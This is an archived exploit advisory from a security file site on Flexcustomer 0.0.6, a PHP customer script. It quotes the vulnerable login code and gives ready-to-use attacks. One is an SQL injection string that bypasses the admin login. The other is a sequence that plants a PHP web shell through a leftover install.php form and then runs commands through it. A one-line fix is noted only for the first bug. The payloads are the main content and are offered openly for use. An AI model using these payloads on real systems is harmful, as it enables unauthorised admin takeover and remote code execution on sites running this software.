exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Flexcustomer 0.0.6 Administrative Login Bypass

Flexcustomer 0.0.6 Administrative Login Bypass
Posted Dec 31, 2008
Authored by Osirys | Site y-osirys.com

Flexcustomer version 0.0.6 suffers from administrative login bypass and possible php data writing vulnerabilities.

tags | exploit, php, vulnerability, bypass
SHA-256 | be5428ee6751c2505cae283d6af7c94558a08377ba31b39d035107f838c9a806

Flexcustomer 0.0.6 Administrative Login Bypass

Change Mirror Download
[START]

####################################################################################################################
[0x01] Informations:

Script : Flexcustomer
Download : http://www.hotscripts.com/jump.php?listing_id=25331&jump_type=1
Vulnerability : Admin Login Bypass / Possible PHP code writing
Author : Osirys
Contact : osirys[at]live[dot]it
Website : http://osirys.org


####################################################################################################################
[0x02] Bug: [Admin Login Bypass]
######

Bug: /[path]/admin/usercheek.php

[CODE]

<?php
session_start();

if (!empty($logincheck)){
$sql = "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'";
$results = $db->select($sql);

[/CODE]

[!FIX] Escape $checkuser and $checkpass in $sql query.


[!] EXPLOIT: /[path]/admin/
Put as username and password: ' or '1=1
You will log in as admin

####################################################################################################################
[0x03] Bug: [Possible PHP data writing]
######

This is not a real bug, but could become it if the administrator doesn't delete the install.php file.
In fact, data that we put in /[path]/admin/install.php forms will be save in a .php file.
So, if install.php is not deleted, we can inject php code, and this bug can become a RCE vulnerability.

[!] EXPLOIT:
1) Go at: /[path]/admin/install.php
2) Put as Database Name this simple PHP code: ";system($_GET['cmd']);$a = "k
3) Fill the other form and press Next
4) Execute your cmd: /[path]/const.inc.php?cmd=id

####################################################################################################################

[/END]

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close